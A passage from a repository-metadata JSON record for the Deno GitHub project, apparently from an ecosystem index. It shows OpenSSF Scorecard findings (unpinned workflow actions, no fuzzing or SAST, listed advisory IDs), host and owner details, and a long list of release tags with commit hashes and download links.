pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url"